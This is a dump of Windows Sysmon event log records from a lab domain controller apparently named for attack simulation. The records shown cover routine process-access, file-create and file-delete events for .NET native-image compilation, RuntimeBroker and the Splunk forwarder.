21:06:47.088{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022262Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.072{4DB9351A-9F2B-60D3-C400-00000000CF01}7765248C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.072{4DB9351A-9F2B-60D3-C400-00000000CF01}7766268C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 10341000x800000000000000022260Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.072{4DB9351A-9F2B-60D3-C400-00000000CF01}7766268C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7 23542300x800000000000000022333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.994{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D9DCDEBF7F67662C2F34D56873B8ADE,SHA256=FC9542079EC4157B97F001CF3E2C53FA326F04382865E339A75A7AD0C7D5F1C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.807{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0505-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.791{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0505-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.791{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0505-00000000CF01}5144C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.463{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0405-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022328Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.447{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0405-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022327Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.447{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0405-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022326Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:48.385{4DB9351A-A268-60D3-0305-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\17f8-0\UIAutomationTypes.dll2021-06-23 21:06:48.385 10341000x800000000000000022325Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.228{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0305-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022324Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.213{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0305-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022323Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.213{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0305-00000000CF01}6136C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022322Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.166{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0205-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022321Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.166{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0205-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022320Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.166{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0205-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000022319Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:48.104{4DB9351A-A268-60D3-0105-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd8-0\UIAutomationProvider.dll2021-06-23 21:06:48.104 23542300x800000000000000022318Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.104{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EFC452D09EE1FF8A7D135ED3D080AEF,SHA256=B0A619C2C0179ADCED21B758D501F13DE324D111D6CE39BD55AD0F61D5117BD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022317Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.041{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A268-60D3-0105-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022316Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.025{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A268-60D3-0105-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022315Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:48.025{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A268-60D3-0105-00000000CF01}3032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000022314Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:47.994{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A267-60D3-0005-00000000CF01}6304C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.962{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0C05-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 